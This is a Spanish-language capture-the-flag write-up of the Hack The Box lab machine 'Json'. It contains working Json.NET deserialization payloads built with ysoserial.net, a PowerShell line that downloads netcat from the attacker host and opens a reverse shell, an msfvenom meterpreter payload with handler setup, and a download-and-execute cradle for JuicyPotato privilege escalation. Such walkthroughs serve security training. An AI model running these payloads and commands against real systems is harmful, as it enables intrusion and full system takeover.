This page looks best with JavaScript enabled

Hack The Box - Json

 ·  ☕ 6 min read  ·  ✍️ sckull

Json es una maquina de HackTheBox aqui encontrarás la solucion para obtener la flag user.txt y root.txt.

Informacion de la Maquina

Nombre Json
OS Linux
Puntos 30
Dificultad Media
IP 10.10.10.158
Maker Cyb3rb0b

MASSCAN & NMAP

Escaneo de puerto tcp/udp, en el cual nos muestra varios puertos abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
root@kali:~/htb/json# masscan -p1-65535,U:1-65535 10.10.10.158 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-09-30 22:56:02 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49153/tcp on 10.10.10.158                                 
Discovered open port 445/tcp on 10.10.10.158                                   
Discovered open port 5985/tcp on 10.10.10.158                                  
Discovered open port 139/tcp on 10.10.10.158                                   
Discovered open port 49155/tcp on 10.10.10.158                                 
Discovered open port 135/tcp on 10.10.10.158                                   
Discovered open port 47001/tcp on 10.10.10.158                                 
Discovered open port 49157/tcp on 10.10.10.158                                 
Discovered open port 21/tcp on 10.10.10.158                                    
Discovered open port 49152/tcp on 10.10.10.158

# Nmap 7.80 scan initiated Mon Sep 30 19:14:28 2019 as: nmap -p- --min-rate 1000 -o nmap.scan 10.10.10.158
Warning: 10.10.10.158 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.158
Host is up (0.23s latency).
Not shown: 64567 closed ports, 954 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown

# Nmap done at Mon Sep 30 19:19:17 2019 -- 1 IP address (1 host up) scanned in 289.09 seconds

# Nmap 7.80 scan initiated Mon Sep 30 19:20:55 2019 as: nmap -p 21,80,135,139,445,5985,47001 -sV -sC -o services_script.nmap 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.56s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp   open  msrpc?
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h00m42s, deviation: 0s, median: 4h00m42s
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:bd:94:b0 (VMware)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-01T03:24:25
|_  start_date: 2019-10-01T00:14:50

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 30 19:24:33 2019 -- 1 IP address (1 host up) scanned in 217.67 seconds

FTP

Intentamos logearnos al servicio ftp con el usuario y contraseña anonymous pero no esta autorizado el usuario, tambien podemos ver la version del servicio ftp.

image

GOBUSTER

Algunos directorios y paginas encontradas con gobuster.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.158
[+] Threads:        15
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] No status:      true
[+] Timeout:        10s
===============================================================
2019/09/30 20:23:11 Starting gobuster
===============================================================
/css
/files
/img
/index.html
/Index.html
/index.html
/js
/login.html
/Login.html
/views
===============================================================
2019/09/30 20:35:16 Finished
===============================================================

/index.html

Visitamos el index de la pagina y nos muestra una plataforma.
image

/login.html

Vemos una pagina de inicio de sesion en esta pagina.

Verificamos las peticiones en index.html y encontramos que en el header existe una Cookie del tipo OAuth2 y tambien.
image

Decodificamos el string en base64 vemos el usuario y contraseña de admin.

1
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

image

Buscamos el hash del usuario admin en crackstation, el cual no sirve de nada.

1
21232f297a57a5a743894a0e4a801fc3:admin

image

Enviamos una solicitud erronea en base64, la cual contenia un mensaje: “Lorem ipsum”.

image
Vemos que dentro del mensaje de error nos muestra “Cannot deserialize Json.Net Object”.

Json.net RCE - Deserialization

Investigamos acerca del framework Json.net y vemos que existe una vulnerabilidad.

Json Attacks

Utilizamos ysoserial.net para poder generar nuestro payload codificado y enviarlo a la maquina, para esto utilizamos el PoC y lo modificamos.

PoC:

1
2
3
4
5
6
7
8
9
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c calc']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Realizamos dos pruebas uno para hacer ping a nuestra maquina local y uno para hacer una prueba de resolucion de dominios.

1
2
3
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "ping -n 5 10.10.14.147" -t > payload_jsonnet_ping.txt

ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywnL2MgcGluZyAtbiA1IDEwLjEwLjE0LjE0NyddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9
1
2
3
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "nslookup sckull 10.10.14.147" -t > payload_jsonnet_nslookup.txt

ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywnL2MgbnNsb29rdXAgc2NrdWxsIDEwLjEwLjE0LjE0NyddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9

Respuesta en Responder (nslookup) y tcpdump (ping).
image

SHELL - userpool

Tomamos el PoC que utilizamos para hacer ping a nuestra maquina y lo modificamos agregandole un comando de powershell para descargar netcat (nc.exe) y, al mismo tiempo ejecutar una shell inversa con netcat.

Comando:

1
powershell -Command "Invoke-WebRequest http://10.10.14.147/nc.exe -OutFile c:/Users/Public/nc.exe" & C:/Users/Public/nc.exe -e cmd.exe 10.10.14.147 7878

Payload:

1
2
3
4
5
6
7
8
9
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c powershell -Command "Invoke-WebRequest http://10.10.14.147/nc.exe -OutFile c:/Users/Public/nc.exe" & C:/Users/Public/nc.exe -e cmd.exe 10.10.14.147 7878 ']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Payload Base64:

1
ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywnL2MgcG93ZXJzaGVsbCAtQ29tbWFuZCAiSW52b2tlLVdlYlJlcXVlc3QgaHR0cDovLzEwLjEwLjE0LjE0Ny9uYy5leGUgLU91dEZpbGUgYzovVXNlcnMvUHVibGljL25jLmV4ZSIgJiBDOi9Vc2Vycy9QdWJsaWMvbmMuZXhlIC1lIGNtZC5leGUgMTAuMTAuMTQuMTQ3IDc4NzggJ10NCiAgICB9LA0KICAgICdPYmplY3RJbnN0YW5jZSc6eyckdHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5J30NCn0NCg==

Codificamos el payload en base64 y lo enviamos, y obtenemos una shell inversa con el usuario userpool.
image

Y obtenemos nuestra flag user.txt.
image

Privilege Escalation

Realizamos una enumeracion de los privilegios del usuario userpool, vemos que tenemos habilitado
SeImpersonatePrivilege, para esta maquina y estos privilegios utilizamos JuicyPotato. Utilizamos la forma “automatica” de JuicyPotato. Realizamos las siguientes modificaciones en los archivos.

1
2
3
Invoke-LovelyPotato.ps1
$RemoteDir = "http://10.10.14.147"
$LocalPath = "C:/Users/Public"

Creamos nuestro payload con Msfvenom:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.147 LPORT=1339 -f exe -o meterpreter.exe

Configuramos metasploit:

1
2
3
4
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.147
set LPORT 1339

Descargamos el archivo de “automatizacion” de JuicyPotato:

1
powershell -Command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.147/Invoke-LovelyPotato.ps1')"

Si queremos realizarlo de forma manual podemos realizar los mismos pasos de la Maquina Conceal.

Al terminar la ejecucion del script obtenemos nuestra shell en meterpreter.
image

Y nuestra flag root.txt.
image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

HTB: Json